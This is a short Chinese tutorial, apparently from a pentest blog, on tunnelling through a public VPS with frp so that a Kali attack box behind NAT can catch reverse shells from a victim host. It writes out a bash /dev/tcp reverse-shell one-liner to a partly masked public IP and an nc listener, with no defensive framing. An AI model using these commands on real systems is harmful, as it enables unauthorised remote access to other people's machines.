前言:
很多时候kali都是处于我们内网的情况下,同时我们也知道,如果我们要进行反弹shell的话是一定要知道公网ip的,那么如何使得受害主机能正常反弹shell,同时我们的kali可以接受到信息呢
正文:
frp是一款非常流行的内网穿透工具,我们这里就要利用frp来进行内网穿透。
首先我们确定一下我们需要做什么
我们需要一台公网ip的服务器来当作我们的frp服务器
kali 我们的攻击机 处于内网环境中
https://github.com/fatedier/frp
首先我们去frp的github链接分别下载到我们的公网vps上和我们的kali上
首先来搭建我们的frp服务器,过程也非常简单:
首先将压缩包进行一个压缩
tar -zxvf frp_0.33.0_linux_amd64.tar.gz
解压之后的文件夹内容如下
可以看到里面有两个一个是frpc 一个是frps
frpc 就代表着 frp client
frps 就代表着 frp server
我们先搭建我们的服务器,所以也就是frps
vim frps.ini
内容就是
[common]
bind_port=7000
我们不需要进行修改,这里代表的就是我们运行frp这个服务的端口是7000
然后我们运行命令
./frps -c ./frps.ini
运行我们的frp服务
接下来配置我们的frp客户端
第一个红框是我们之前搭建的frp服务器的 ip
第二个就是我们kali的ip
local_port 就是我们kali后面监听的端口
Remote_port = 1234 就是我们frp服务器上的端口
运行本地客户端
./frpc -c ./frpc.ini
我们在反弹shell的过程中地址是 公网ip
bash -i >& /dev/tcp/134.175.xxx.xxx/1234 0>&1
我们的frp服务器的1234 接受到我们的请求之后 会根据配置文件转发到我们kali的4444端口上
然后kali本地监听 4444 端口
这样反弹shell就可以成功了
然后kali上监听 nc -lvvp 4444
成功执行命令
然后我们的frp服务器上也显示了对应的日志